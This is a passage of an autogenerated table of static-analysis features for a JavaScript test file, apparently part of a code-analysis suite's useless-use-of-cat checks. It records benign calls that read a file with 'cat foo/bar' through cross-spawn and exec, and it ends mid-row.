autogenerated/ShellCommandInjectionFromEnvironment/UselessUseOfCat/uselesscat.js:156:27:156:32 | 'utf8' | CalleeFlexibleAccessPath | cspawn | +| autogenerated/ShellCommandInjectionFromEnvironment/UselessUseOfCat/uselesscat.js:156:27:156:32 | 'utf8' | InputAccessPathFromCallee | 1.encoding | +| autogenerated/ShellCommandInjectionFromEnvironment/UselessUseOfCat/uselesscat.js:156:27:156:32 | 'utf8' | InputArgumentIndex | 1 | +| autogenerated/ShellCommandInjectionFromEnvironment/UselessUseOfCat/uselesscat.js:156:27:156:32 | 'utf8' | assignedToPropName | encoding | +| autogenerated/ShellCommandInjectionFromEnvironment/UselessUseOfCat/uselesscat.js:156:27:156:32 | 'utf8' | calleeImports | cross-spawn | +| autogenerated/ShellCommandInjectionFromEnvironment/UselessUseOfCat/uselesscat.js:156:27:156:32 | 'utf8' | contextFunctionInterfaces | cat(file) | +| autogenerated/ShellCommandInjectionFromEnvironment/UselessUseOfCat/uselesscat.js:156:27:156:32 | 'utf8' | contextSurroundingFunctionParameters | | +| autogenerated/ShellCommandInjectionFromEnvironment/UselessUseOfCat/uselesscat.js:156:27:156:32 | 'utf8' | fileImports | child_process cross-spawn exec express fs shelljs | +| autogenerated/ShellCommandInjectionFromEnvironment/UselessUseOfCat/uselesscat.js:158:5:158:12 | myResult | contextFunctionInterfaces | cat(file) | +| autogenerated/ShellCommandInjectionFromEnvironment/UselessUseOfCat/uselesscat.js:158:5:158:12 | myResult | contextSurroundingFunctionParameters | | +| autogenerated/ShellCommandInjectionFromEnvironment/UselessUseOfCat/uselesscat.js:158:5:158:12 | myResult | fileImports | child_process cross-spawn exec express fs shelljs | +| autogenerated/ShellCommandInjectionFromEnvironment/UselessUseOfCat/uselesscat.js:158:5:158:46 | myResul ... /bar']) | contextFunctionInterfaces | cat(file) | +| autogenerated/ShellCommandInjectionFromEnvironment/UselessUseOfCat/uselesscat.js:158:5:158:46 | myResul ... /bar']) | contextSurroundingFunctionParameters | | +| autogenerated/ShellCommandInjectionFromEnvironment/UselessUseOfCat/uselesscat.js:158:5:158:46 | myResul ... /bar']) | fileImports | child_process cross-spawn exec express fs shelljs | +| autogenerated/ShellCommandInjectionFromEnvironment/UselessUseOfCat/uselesscat.js:158:16:158:21 | cspawn | contextFunctionInterfaces | cat(file) | +| autogenerated/ShellCommandInjectionFromEnvironment/UselessUseOfCat/uselesscat.js:158:16:158:21 | cspawn | contextSurroundingFunctionParameters | | +| autogenerated/ShellCommandInjectionFromEnvironment/UselessUseOfCat/uselesscat.js:158:16:158:21 | cspawn | fileImports | child_process cross-spawn exec express fs shelljs | +| autogenerated/ShellCommandInjectionFromEnvironment/UselessUseOfCat/uselesscat.js:158:16:158:26 | cspawn.sync | contextFunctionInterfaces | cat(file) | +| autogenerated/ShellCommandInjectionFromEnvironment/UselessUseOfCat/uselesscat.js:158:16:158:26 | cspawn.sync | contextSurroundingFunctionParameters | | +| autogenerated/ShellCommandInjectionFromEnvironment/UselessUseOfCat/uselesscat.js:158:16:158:26 | cspawn.sync | fileImports | child_process cross-spawn exec express fs shelljs | +| autogenerated/ShellCommandInjectionFromEnvironment/UselessUseOfCat/uselesscat.js:158:16:158:46 | cspawn. ... /bar']) | contextFunctionInterfaces | cat(file) | +| autogenerated/ShellCommandInjectionFromEnvironment/UselessUseOfCat/uselesscat.js:158:16:158:46 | cspawn. ... /bar']) | contextSurroundingFunctionParameters | | +| autogenerated/ShellCommandInjectionFromEnvironment/UselessUseOfCat/uselesscat.js:158:16:158:46 | cspawn. ... /bar']) | fileImports | child_process cross-spawn exec express fs shelljs | +| autogenerated/ShellCommandInjectionFromEnvironment/UselessUseOfCat/uselesscat.js:158:16:158:46 | exceptional return of cspawn. ... /bar']) | contextFunctionInterfaces | cat(file) | +| autogenerated/ShellCommandInjectionFromEnvironment/UselessUseOfCat/uselesscat.js:158:16:158:46 | exceptional return of cspawn. ... /bar']) | contextSurroundingFunctionParameters | | +| autogenerated/ShellCommandInjectionFromEnvironment/UselessUseOfCat/uselesscat.js:158:16:158:46 | exceptional return of cspawn. ... /bar']) | fileImports | child_process cross-spawn exec express fs shelljs | +| autogenerated/ShellCommandInjectionFromEnvironment/UselessUseOfCat/uselesscat.js:158:23:158:26 | sync | contextFunctionInterfaces | cat(file) | +| autogenerated/ShellCommandInjectionFromEnvironment/UselessUseOfCat/uselesscat.js:158:23:158:26 | sync | contextSurroundingFunctionParameters | | +| autogenerated/ShellCommandInjectionFromEnvironment/UselessUseOfCat/uselesscat.js:158:23:158:26 | sync | fileImports | child_process cross-spawn exec express fs shelljs | +| autogenerated/ShellCommandInjectionFromEnvironment/UselessUseOfCat/uselesscat.js:158:28:158:32 | 'cat' | CalleeFlexibleAccessPath | cspawn.sync | +| autogenerated/ShellCommandInjectionFromEnvironment/UselessUseOfCat/uselesscat.js:158:28:158:32 | 'cat' | InputArgumentIndex | 0 | +| autogenerated/ShellCommandInjectionFromEnvironment/UselessUseOfCat/uselesscat.js:158:28:158:32 | 'cat' | calleeImports | cross-spawn | +| autogenerated/ShellCommandInjectionFromEnvironment/UselessUseOfCat/uselesscat.js:158:28:158:32 | 'cat' | contextFunctionInterfaces | cat(file) | +| autogenerated/ShellCommandInjectionFromEnvironment/UselessUseOfCat/uselesscat.js:158:28:158:32 | 'cat' | contextSurroundingFunctionParameters | | +| autogenerated/ShellCommandInjectionFromEnvironment/UselessUseOfCat/uselesscat.js:158:28:158:32 | 'cat' | fileImports | child_process cross-spawn exec express fs shelljs | +| autogenerated/ShellCommandInjectionFromEnvironment/UselessUseOfCat/uselesscat.js:158:28:158:32 | 'cat' | receiverName | cspawn | +| autogenerated/ShellCommandInjectionFromEnvironment/UselessUseOfCat/uselesscat.js:158:35:158:45 | ['foo/bar'] | CalleeFlexibleAccessPath | cspawn.sync | +| autogenerated/ShellCommandInjectionFromEnvironment/UselessUseOfCat/uselesscat.js:158:35:158:45 | ['foo/bar'] | InputArgumentIndex | 1 | +| autogenerated/ShellCommandInjectionFromEnvironment/UselessUseOfCat/uselesscat.js:158:35:158:45 | ['foo/bar'] | calleeImports | cross-spawn | +| autogenerated/ShellCommandInjectionFromEnvironment/UselessUseOfCat/uselesscat.js:158:35:158:45 | ['foo/bar'] | contextFunctionInterfaces | cat(file) | +| autogenerated/ShellCommandInjectionFromEnvironment/UselessUseOfCat/uselesscat.js:158:35:158:45 | ['foo/bar'] | contextSurroundingFunctionParameters | | +| autogenerated/ShellCommandInjectionFromEnvironment/UselessUseOfCat/uselesscat.js:158:35:158:45 | ['foo/bar'] | fileImports | child_process cross-spawn exec express fs shelljs | +| autogenerated/ShellCommandInjectionFromEnvironment/UselessUseOfCat/uselesscat.js:158:35:158:45 | ['foo/bar'] | receiverName | cspawn | +| autogenerated/ShellCommandInjectionFromEnvironment/UselessUseOfCat/uselesscat.js:158:36:158:44 | 'foo/bar' | contextFunctionInterfaces | cat(file) | +| autogenerated/ShellCommandInjectionFromEnvironment/UselessUseOfCat/uselesscat.js:158:36:158:44 | 'foo/bar' | contextFunctionInterfaces | cat(file) | +| autogenerated/ShellCommandInjectionFromEnvironment/UselessUseOfCat/uselesscat.js:158:36:158:44 | 'foo/bar' | contextSurroundingFunctionParameters | | +| autogenerated/ShellCommandInjectionFromEnvironment/UselessUseOfCat/uselesscat.js:158:36:158:44 | 'foo/bar' | contextSurroundingFunctionParameters | | +| autogenerated/ShellCommandInjectionFromEnvironment/UselessUseOfCat/uselesscat.js:158:36:158:44 | 'foo/bar' | fileImports | child_process cross-spawn exec express fs shelljs | +| autogenerated/ShellCommandInjectionFromEnvironment/UselessUseOfCat/uselesscat.js:158:36:158:44 | 'foo/bar' | fileImports | child_process cross-spawn exec express fs shelljs | +| autogenerated/ShellCommandInjectionFromEnvironment/UselessUseOfCat/uselesscat.js:159:5:159:12 | myResult | contextFunctionInterfaces | cat(file) | +| autogenerated/ShellCommandInjectionFromEnvironment/UselessUseOfCat/uselesscat.js:159:5:159:12 | myResult | contextSurroundingFunctionParameters | | +| autogenerated/ShellCommandInjectionFromEnvironment/UselessUseOfCat/uselesscat.js:159:5:159:12 | myResult | fileImports | child_process cross-spawn exec express fs shelljs | +| autogenerated/ShellCommandInjectionFromEnvironment/UselessUseOfCat/uselesscat.js:159:5:159:68 | myResul ... tf8' }) | contextFunctionInterfaces | cat(file) | +| autogenerated/ShellCommandInjectionFromEnvironment/UselessUseOfCat/uselesscat.js:159:5:159:68 | myResul ... tf8' }) | contextSurroundingFunctionParameters | | +| autogenerated/ShellCommandInjectionFromEnvironment/UselessUseOfCat/uselesscat.js:159:5:159:68 | myResul ... tf8' }) | fileImports | child_process cross-spawn exec express fs shelljs | +| autogenerated/ShellCommandInjectionFromEnvironment/UselessUseOfCat/uselesscat.js:159:16:159:21 | cspawn | contextFunctionInterfaces | cat(file) | +| autogenerated/ShellCommandInjectionFromEnvironment/UselessUseOfCat/uselesscat.js:159:16:159:21 | cspawn | contextSurroundingFunctionParameters | | +| autogenerated/ShellCommandInjectionFromEnvironment/UselessUseOfCat/uselesscat.js:159:16:159:21 | cspawn | fileImports | child_process cross-spawn exec express fs shelljs | +| autogenerated/ShellCommandInjectionFromEnvironment/UselessUseOfCat/uselesscat.js:159:16:159:26 | cspawn.sync | contextFunctionInterfaces | cat(file) | +| autogenerated/ShellCommandInjectionFromEnvironment/UselessUseOfCat/uselesscat.js:159:16:159:26 | cspawn.sync | contextSurroundingFunctionParameters | | +| autogenerated/ShellCommandInjectionFromEnvironment/UselessUseOfCat/uselesscat.js:159:16:159:26 | cspawn.sync | fileImports | child_process cross-spawn exec express fs shelljs | +| autogenerated/ShellCommandInjectionFromEnvironment/UselessUseOfCat/uselesscat.js:159:16:159:68 | cspawn. ... tf8' }) | contextFunctionInterfaces | cat(file) | +| autogenerated/ShellCommandInjectionFromEnvironment/UselessUseOfCat/uselesscat.js:159:16:159:68 | cspawn. ... tf8' }) | contextSurroundingFunctionParameters | | +| autogenerated/ShellCommandInjectionFromEnvironment/UselessUseOfCat/uselesscat.js:159:16:159:68 | cspawn. ... tf8' }) | fileImports | child_process cross-spawn exec express fs shelljs | +| autogenerated/ShellCommandInjectionFromEnvironment/UselessUseOfCat/uselesscat.js:159:16:159:68 | exceptional return of cspawn. ... tf8' }) | contextFunctionInterfaces | cat(file) | +| autogenerated/ShellCommandInjectionFromEnvironment/UselessUseOfCat/uselesscat.js:159:16:159:68 | exceptional return of cspawn. ... tf8' }) | contextSurroundingFunctionParameters | | +| autogenerated/ShellCommandInjectionFromEnvironment/UselessUseOfCat/uselesscat.js:159:16:159:68 | exceptional return of cspawn. ... tf8' }) | fileImports | child_process cross-spawn exec express fs shelljs | +| autogenerated/ShellCommandInjectionFromEnvironment/UselessUseOfCat/uselesscat.js:159:23:159:26 | sync | contextFunctionInterfaces | cat(file) | +| autogenerated/ShellCommandInjectionFromEnvironment/UselessUseOfCat/uselesscat.js:159:23:159:26 | sync | contextSurroundingFunctionParameters | | +| autogenerated/ShellCommandInjectionFromEnvironment/UselessUseOfCat/uselesscat.js:159:23:159:26 | sync | fileImports | child_process cross-spawn exec express fs shelljs | +| autogenerated/ShellCommandInjectionFromEnvironment/UselessUseOfCat/uselesscat.js:159:28:159:32 | 'cat' | CalleeFlexibleAccessPath | cspawn.sync | +| autogenerated/ShellCommandInjectionFromEnvironment/UselessUseOfCat/uselesscat.js:159:28:159:32 | 'cat' | InputArgumentIndex | 0 | +| autogenerated/ShellCommandInjectionFromEnvironment/UselessUseOfCat/uselesscat.js:159:28:159:32 | 'cat' | calleeImports | cross-spawn | +| autogenerated/ShellCommandInjectionFromEnvironment/UselessUseOfCat/uselesscat.js:159:28:159:32 | 'cat' | contextFunctionInterfaces | cat(file) | +| autogenerated/ShellCommandInjectionFromEnvironment/UselessUseOfCat/uselesscat.js:159:28:159:32 | 'cat' | contextSurroundingFunctionParameters | | +| autogenerated/ShellCommandInjectionFromEnvironment/UselessUseOfCat/uselesscat.js:159:28:159:32 | 'cat' | fileImports | child_process cross-spawn exec express fs shelljs | +| autogenerated/ShellCommandInjectionFromEnvironment/UselessUseOfCat/uselesscat.js:159:28:159:32 | 'cat' | receiverName | cspawn | +| autogenerated/ShellCommandInjectionFromEnvironment/UselessUseOfCat/uselesscat.js:159:35:159:45 | ['foo/bar'] | CalleeFlexibleAccessPath | cspawn.sync | +| autogenerated/ShellCommandInjectionFromEnvironment/UselessUseOfCat/uselesscat.js:159:35:159:45 | ['foo/bar'] | InputArgumentIndex | 1 | +| autogenerated/ShellCommandInjectionFromEnvironment/UselessUseOfCat/uselesscat.js:159:35:159:45 | ['foo/bar'] | calleeImports | cross-spawn | +| autogenerated/ShellCommandInjectionFromEnvironment/UselessUseOfCat/uselesscat.js:159:35:159:45 | ['foo/bar'] | contextFunctionInterfaces | cat(file) | +| autogenerated/ShellCommandInjectionFromEnvironment/UselessUseOfCat/uselesscat.js:159:35:159:45 | ['foo/bar'] | contextSurroundingFunctionParameters | | +| autogenerated/ShellCommandInjectionFromEnvironment/UselessUseOfCat/uselesscat.js:159:35:159:45 | ['foo/bar'] | fileImports | child_process cross-spawn exec express fs shelljs | +| autogenerated/ShellCommandInjectionFromEnvironment/UselessUseOfCat/uselesscat.js:159:35:159:45 | ['foo/bar'] | receiverName | cspawn | +| autogenerated/ShellCommandInjectionFromEnvironment/UselessUseOfCat/uselesscat.js:159:36:159:44 | 'foo/bar' | contextFunctionInterfaces | cat(file) | +| autogenerated/ShellCommandInjectionFromEnvironment/UselessUseOfCat/uselesscat.js:159:36:159:44 | 'foo/bar' | contextFunctionInterfaces | cat(file) | +| autogenerated/ShellCommandInjectionFromEnvironment/UselessUseOfCat/uselesscat.js:159:36:159:44 | 'foo/bar' | contextSurroundingFunctionParameters | | +| autogenerated/ShellCommandInjectionFromEnvironment/UselessUseOfCat/uselesscat.js:159:36:159:44 | 'foo/bar' | contextSurroundingFunctionParameters | | +| autogenerated/ShellCommandInjectionFromEnvironment/UselessUseOfCat/uselesscat.js:159:36:159:44 | 'foo/bar' | fileImports | child_process cross-spawn exec express fs shelljs | +| autogenerated/ShellCommandInjectionFromEnvironment/UselessUseOfCat/uselesscat.js:159:36:159:44 | 'foo/bar' | fileImports | child_process cross-spawn exec express fs shelljs | +| autogenerated/ShellCommandInjectionFromEnvironment/UselessUseOfCat/uselesscat.js:159:48:159:67 | { encoding: 'utf8' } | CalleeFlexibleAccessPath | cspawn.sync | +| autogenerated/ShellCommandInjectionFromEnvironment/UselessUseOfCat/uselesscat.js:159:48:159:67 | { encoding: 'utf8' } | InputArgumentIndex | 2 | +| autogenerated/ShellCommandInjectionFromEnvironment/UselessUseOfCat/uselesscat.js:159:48:159:67 | { encoding: 'utf8' } | calleeImports | cross-spawn | +| autogenerated/ShellCommandInjectionFromEnvironment/UselessUseOfCat/uselesscat.js:159:48:159:67 | { encoding: 'utf8' } | contextFunctionInterfaces | cat(file) | +| autogenerated/ShellCommandInjectionFromEnvironment/UselessUseOfCat/uselesscat.js:159:48:159:67 | { encoding: 'utf8' } | contextSurroundingFunctionParameters | | +| autogenerated/ShellCommandInjectionFromEnvironment/UselessUseOfCat/uselesscat.js:159:48:159:67 | { encoding: 'utf8' } | fileImports | child_process cross-spawn exec express fs shelljs | +| autogenerated/ShellCommandInjectionFromEnvironment/UselessUseOfCat/uselesscat.js:159:48:159:67 | { encoding: 'utf8' } | receiverName | cspawn | +| autogenerated/ShellCommandInjectionFromEnvironment/UselessUseOfCat/uselesscat.js:159:50:159:57 | encoding | contextFunctionInterfaces | cat(file) | +| autogenerated/ShellCommandInjectionFromEnvironment/UselessUseOfCat/uselesscat.js:159:50:159:57 | encoding | contextSurroundingFunctionParameters | | +| autogenerated/ShellCommandInjectionFromEnvironment/UselessUseOfCat/uselesscat.js:159:50:159:57 | encoding | fileImports | child_process cross-spawn exec express fs shelljs | +| autogenerated/ShellCommandInjectionFromEnvironment/UselessUseOfCat/uselesscat.js:159:50:159:65 | encoding: 'utf8' | contextFunctionInterfaces | cat(file) | +| autogenerated/ShellCommandInjectionFromEnvironment/UselessUseOfCat/uselesscat.js:159:50:159:65 | encoding: 'utf8' | contextFunctionInterfaces | cat(file) | +| autogenerated/ShellCommandInjectionFromEnvironment/UselessUseOfCat/uselesscat.js:159:50:159:65 | encoding: 'utf8' | contextSurroundingFunctionParameters | | +| autogenerated/ShellCommandInjectionFromEnvironment/UselessUseOfCat/uselesscat.js:159:50:159:65 | encoding: 'utf8' | contextSurroundingFunctionParameters | | +| autogenerated/ShellCommandInjectionFromEnvironment/UselessUseOfCat/uselesscat.js:159:50:159:65 | encoding: 'utf8' | fileImports | child_process cross-spawn exec express fs shelljs | +| autogenerated/ShellCommandInjectionFromEnvironment/UselessUseOfCat/uselesscat.js:159:50:159:65 | encoding: 'utf8' | fileImports | child_process cross-spawn exec express fs shelljs | +| autogenerated/ShellCommandInjectionFromEnvironment/UselessUseOfCat/uselesscat.js:159:60:159:65 | 'utf8' | CalleeFlexibleAccessPath | cspawn.sync | +| autogenerated/ShellCommandInjectionFromEnvironment/UselessUseOfCat/uselesscat.js:159:60:159:65 | 'utf8' | InputAccessPathFromCallee | 2.encoding | +| autogenerated/ShellCommandInjectionFromEnvironment/UselessUseOfCat/uselesscat.js:159:60:159:65 | 'utf8' | InputArgumentIndex | 2 | +| autogenerated/ShellCommandInjectionFromEnvironment/UselessUseOfCat/uselesscat.js:159:60:159:65 | 'utf8' | assignedToPropName | encoding | +| autogenerated/ShellCommandInjectionFromEnvironment/UselessUseOfCat/uselesscat.js:159:60:159:65 | 'utf8' | calleeImports | cross-spawn | +| autogenerated/ShellCommandInjectionFromEnvironment/UselessUseOfCat/uselesscat.js:159:60:159:65 | 'utf8' | contextFunctionInterfaces | cat(file) | +| autogenerated/ShellCommandInjectionFromEnvironment/UselessUseOfCat/uselesscat.js:159:60:159:65 | 'utf8' | contextSurroundingFunctionParameters | | +| autogenerated/ShellCommandInjectionFromEnvironment/UselessUseOfCat/uselesscat.js:159:60:159:65 | 'utf8' | fileImports | child_process cross-spawn exec express fs shelljs | +| autogenerated/ShellCommandInjectionFromEnvironment/UselessUseOfCat/uselesscat.js:161:5:161:11 | execmod | contextFunctionInterfaces | cat(file) | +| autogenerated/ShellCommandInjectionFromEnvironment/UselessUseOfCat/uselesscat.js:161:5:161:11 | execmod | contextSurroundingFunctionParameters | | +| autogenerated/ShellCommandInjectionFromEnvironment/UselessUseOfCat/uselesscat.js:161:5:161:11 | execmod | fileImports | child_process cross-spawn exec express fs shelljs | +| autogenerated/ShellCommandInjectionFromEnvironment/UselessUseOfCat/uselesscat.js:161:5:161:29 | execmod | contextFunctionInterfaces | cat(file) | +| autogenerated/ShellCommandInjectionFromEnvironment/UselessUseOfCat/uselesscat.js:161:5:161:29 | execmod | contextSurroundingFunctionParameters | | +| autogenerated/ShellCommandInjectionFromEnvironment/UselessUseOfCat/uselesscat.js:161:5:161:29 | execmod | fileImports | child_process cross-spawn exec express fs shelljs | +| autogenerated/ShellCommandInjectionFromEnvironment/UselessUseOfCat/uselesscat.js:161:5:161:29 | execmod ... 'exec') | contextFunctionInterfaces | cat(file) | +| autogenerated/ShellCommandInjectionFromEnvironment/UselessUseOfCat/uselesscat.js:161:5:161:29 | execmod ... 'exec') | contextSurroundingFunctionParameters | | +| autogenerated/ShellCommandInjectionFromEnvironment/UselessUseOfCat/uselesscat.js:161:5:161:29 | execmod ... 'exec') | fileImports | child_process cross-spawn exec express fs shelljs | +| autogenerated/ShellCommandInjectionFromEnvironment/UselessUseOfCat/uselesscat.js:161:15:161:21 | require | contextFunctionInterfaces | cat(file) | +| autogenerated/ShellCommandInjectionFromEnvironment/UselessUseOfCat/uselesscat.js:161:15:161:21 | require | contextSurroundingFunctionParameters | | +| autogenerated/ShellCommandInjectionFromEnvironment/UselessUseOfCat/uselesscat.js:161:15:161:21 | require | fileImports | child_process cross-spawn exec express fs shelljs | +| autogenerated/ShellCommandInjectionFromEnvironment/UselessUseOfCat/uselesscat.js:161:15:161:29 | exceptional return of require('exec') | contextFunctionInterfaces | cat(file) | +| autogenerated/ShellCommandInjectionFromEnvironment/UselessUseOfCat/uselesscat.js:161:15:161:29 | exceptional return of require('exec') | contextSurroundingFunctionParameters | | +| autogenerated/ShellCommandInjectionFromEnvironment/UselessUseOfCat/uselesscat.js:161:15:161:29 | exceptional return of require('exec') | fileImports | child_process cross-spawn exec express fs shelljs | +| autogenerated/ShellCommandInjectionFromEnvironment/UselessUseOfCat/uselesscat.js:161:15:161:29 | require('exec') | contextFunctionInterfaces | cat(file) | +| autogenerated/ShellCommandInjectionFromEnvironment/UselessUseOfCat/uselesscat.js:161:15:161:29 | require('exec') | contextSurroundingFunctionParameters | | +| autogenerated/ShellCommandInjectionFromEnvironment/UselessUseOfCat/uselesscat.js:161:15:161:29 | require('exec') | fileImports | child_process cross-spawn exec express fs shelljs | +| autogenerated/ShellCommandInjectionFromEnvironment/UselessUseOfCat/uselesscat.js:161:23:161:28 | 'exec' | CalleeFlexibleAccessPath | require | +| autogenerated/ShellCommandInjectionFromEnvironment/UselessUseOfCat/uselesscat.js:161:23:161:28 | 'exec' | InputArgumentIndex | 0 | +| autogenerated/ShellCommandInjectionFromEnvironment/UselessUseOfCat/uselesscat.js:161:23:161:28 | 'exec' | calleeImports | | +| autogenerated/ShellCommandInjectionFromEnvironment/UselessUseOfCat/uselesscat.js:161:23:161:28 | 'exec' | contextFunctionInterfaces | cat(file) | +| autogenerated/ShellCommandInjectionFromEnvironment/UselessUseOfCat/uselesscat.js:161:23:161:28 | 'exec' | contextSurroundingFunctionParameters | | +| autogenerated/ShellCommandInjectionFromEnvironment/UselessUseOfCat/uselesscat.js:161:23:161:28 | 'exec' | fileImports | child_process cross-spawn exec express fs shelljs | +| autogenerated/ShellCommandInjectionFromEnvironment/UselessUseOfCat/uselesscat.js:162:1:162:7 | execmod | contextFunctionInterfaces | cat(file) | +| autogenerated/ShellCommandInjectionFromEnvironment/UselessUseOfCat/uselesscat.js:162:1:162:7 | execmod | contextSurroundingFunctionParameters | | +| autogenerated/ShellCommandInjectionFromEnvironment/UselessUseOfCat/uselesscat.js:162:1:162:7 | execmod | fileImports | child_process cross-spawn exec express fs shelljs | +| autogenerated/ShellCommandInjectionFromEnvironment/UselessUseOfCat/uselesscat.js:162:1:162:56 | exceptional return of execmod ... (out)}) | contextFunctionInterfaces | cat(file) | +| autogenerated/ShellCommandInjectionFromEnvironment/UselessUseOfCat/uselesscat.js:162:1:162:56 | exceptional return of execmod ... (out)}) | contextSurroundingFunctionParameters | | +| autogenerated/ShellCommandInjectionFromEnvironment/UselessUseOfCat/uselesscat.js:162:1:162:56 | exceptional return of execmod ... (out)}) | fileImports | child_process cross-spawn exec express fs shelljs | +| autogenerated/ShellCommandInjectionFromEnvironment/UselessUseOfCat/uselesscat.js:162:1:162:56 | execmod ... (out)}) | contextFunctionInterfaces | cat(file) | +| autogenerated/ShellCommandInjectionFromEnvironment/UselessUseOfCat/uselesscat.js:162:1:162:56 | execmod ... (out)}) | contextSurroundingFunctionParameters | | +| autogenerated/ShellCommandInjectionFromEnvironment/UselessUseOfCat/uselesscat.js:162:1:162:56 | execmod ... (out)}) | fileImports | child_process cross-spawn exec express fs shelljs | +| autogenerated/ShellCommandInjectionFromEnvironment/UselessUseOfCat/uselesscat.js:162:9:162:21 | "cat foo/bar" | CalleeFlexibleAccessPath | execmod | +| autogenerated/ShellCommandInjectionFromEnvironment/UselessUseOfCat/uselesscat.js:162:9:162:21 | "cat foo/bar" | InputArgumentIndex | 0 | +| autogenerated/ShellCommandInjectionFromEnvironment/UselessUseOfCat/uselesscat.js:162:9:162:21 | "cat foo/bar" | calleeImports | exec | +| autogenerated/ShellCommandInjectionFromEnvironment/UselessUseOfCat/uselesscat.js:162:9:162:21 | "cat foo/bar" | contextFunctionInterfaces | cat(file) | +| autogenerated/ShellCommandInjectionFromEnvironment/UselessUseOfCat/uselesscat.js:162:9:162:21 | "cat foo/bar" | contextSurroundingFunctionParameters | | +| autogenerated/ShellCommandInjectionFromEnvironment/UselessUseOfCat/uselesscat.js:162:9:162:21 | "cat foo/bar" | fileImports | child_process cross-spawn exec express fs shelljs | +| autogenerated/ShellCommandInjectionFromEnvironment/UselessUseOfCat/uselesscat.js:162:24:162:55 | 'arguments' object of anonymous function | contextFunctionInterfaces | cat(file) | +| autogenerated/ShellCommandInjectionFromEnvironment/UselessUseOfCat/uselesscat.js:162:24:162:55 | 'arguments' object of anonymous function | contextSurroundingFunctionParameters | | +| autogenerated/ShellCommandInjectionFromEnvironment/UselessUseOfCat/uselesscat.js:162:24:162:55 | 'arguments' object of anonymous function | enclosingFunctionBody | err out console log out | +| autogenerated/ShellCommandInjectionFromEnvironment/UselessUseOfCat/uselesscat.js:162:24:162:55 | 'arguments' object of anonymous function | enclosingFunctionName | execmod#functionalargument | +| autogenerated/ShellCommandInjectionFromEnvironment/UselessUseOfCat/uselesscat.js:162:24:162:55 | 'arguments' object of anonymous function | fileImports | child_process cross-spawn exec express fs shelljs | +| autogenerated/ShellCommandInjectionFromEnvironment/UselessUseOfCat/uselesscat.js:162:24:162:55 | (err, o ... g(out)} | CalleeFlexibleAccessPath | execmod | +| autogenerated/ShellCommandInjectionFromEnvironment/UselessUseOfCat/uselesscat.js:162:24:162:55 | (err, o ... g(out)} | InputArgumentIndex | 1 | +| autogenerated/ShellCommandInjectionFromEnvironment/UselessUseOfCat/uselesscat.js:162:24:162:55 | (err, o ... g(out)} | calleeImports | exec | +| autogenerated/ShellCommandInjectionFromEnvironment/UselessUseOfCat/uselesscat.js:162:24:162:55 | (err, o ... g(out)} | contextFunctionInterfaces | cat(file) | +| autogenerated/ShellCommandInjectionFromEnvironment/UselessUseOfCat/uselesscat.js:162:24:162:55 | (err, o ... g(out)} | contextSurroundingFunctionParameters | (err, out) | +| autogenerated/ShellCommandInjectionFromEnvironment/UselessUseOfCat/uselesscat.js:162:24:162:55 | (err, o ... g(out)} | fileImports | child_process cross-spawn exec express fs shelljs | +| autogenerated/ShellCommandInjectionFromEnvironment/UselessUseOfCat/uselesscat.js:162:24:162:55 | exceptional return of anonymous function | contextFunctionInterfaces | cat(file) | +| autogenerated/ShellCommandInjectionFromEnvironment/UselessUseOfCat/uselesscat.js:162:24:162:55 | exceptional return of anonymous function | contextSurroundingFunctionParameters | | +| autogenerated/ShellCommandInjectionFromEnvironment/UselessUseOfCat/uselesscat.js:162:24:162:55 | exceptional return of anonymous function | enclosingFunctionBody | err out console log out | +| autogenerated/ShellCommandInjectionFromEnvironment/UselessUseOfCat/uselesscat.js:162:24:162:55 | exceptional return of anonymous function | enclosingFunctionName | execmod#functionalargument | +| autogenerated/ShellCommandInjectionFromEnvironment/UselessUseOfCat/uselesscat.js:162:24:162:55 | exceptional return of anonymous function | fileImports | child_process cross-spawn exec express fs shelljs | +| autogenerated/ShellCommandInjectionFromEnvironment/UselessUseOfCat/uselesscat.js:162:24:162:55 | return of anonymous function | contextFunctionInterfaces | cat(file) | +| autogenerated/ShellCommandInjectionFromEnvironment/UselessUseOfCat/uselesscat.js:162:24:162:55 | return of anonymous function | contextSurroundingFunctionParameters | | +| autogenerated/ShellCommandInjectionFromEnvironment/UselessUseOfCat/uselesscat.js:162:24:162:55 | return of anonymous function | enclosingFunctionBody | err out console log out | +| autogenerated/ShellCommandInjectionFromEnvironment/UselessUseOfCat/uselesscat.js:162:24:162:55 | return of anonymous function | enclosingFunctionName | execmod#functionalargument | +| autogenerated/ShellCommandInjectionFromEnvironment/UselessUseOfCat/uselesscat.js:162:24:162:55 | return of anonymous function | fileImports | child_process cross-spawn exec express fs shelljs | +| autogenerated/ShellCommandInjectionFromEnvironment/UselessUseOfCat/uselesscat.js:162:25:162:27 | err | contextFunctionInterfaces | cat(file) | +| autogenerated/ShellCommandInjectionFromEnvironment/UselessUseOfCat/uselesscat.js:162:25:162:27 | err | contextSurroundingFunctionParameters | (err, out) | +| autogenerated/ShellCommandInjectionFromEnvironment/UselessUseOfCat/uselesscat.js:162:25:162:27 | err | enclosingFunctionBody | err out console log out | +| autogenerated/ShellCommandInjectionFromEnvironment/UselessUseOfCat/uselesscat.js:162:25:162:27 | err | enclosingFunctionName | execmod#functionalargument | +| autogenerated/ShellCommandInjectionFromEnvironment/UselessUseOfCat/uselesscat.js:162:25:162:27 | err | fileImports | child_process cross-spawn exec express fs shelljs | +| autogenerated/ShellCommandInjectionFromEnvironment/UselessUseOfCat/uselesscat.js:162:30:162:32 | out | contextFunctionInterfaces | cat(file) | +| autogenerated/ShellCommandInjectionFromEnvironment/UselessUseOfCat/uselesscat.js:162:30:162:32 | out | contextFunctionInterfaces | cat(file) | +| autogenerated/ShellCommandInjectionFromEnvironment/UselessUseOfCat/uselesscat.js:162:30:162:32 | out | contextSurroundingFunctionParameters | | +| autogenerated/ShellCommandInjectionFromEnvironment/UselessUseOfCat/uselesscat.js:162:30:162:32 | out | contextSurroundingFunctionParameters | (err, out) | +| autogenerated/ShellCommandInjectionFromEnvironment/UselessUseOfCat/uselesscat.js:162:30:162:32 | out | enclosingFunctionBody | err out console log out | +| autogenerated/ShellCommandInjectionFromEnvironment/UselessUseOfCat/uselesscat.js:162:30:162:32 | out | enclosingFunctionBody | err out console log out | +| autogenerated/ShellCommandInjectionFromEnvironment/UselessUseOfCat/uselesscat.js:162:30:162:32 | out | enclosingFunctionName | execmod#functionalargument | +| autogenerated/ShellCommandInjectionFromEnvironment/UselessUseOfCat/uselesscat.js:162:30:162:32 | out | enclosingFunctionName | execmod#functionalargument | +| autogenerated/ShellCommandInjectionFromEnvironment/UselessUseOfCat/uselesscat.js:162:30:162:32 | out | fileImports | child_process cross-spawn exec express 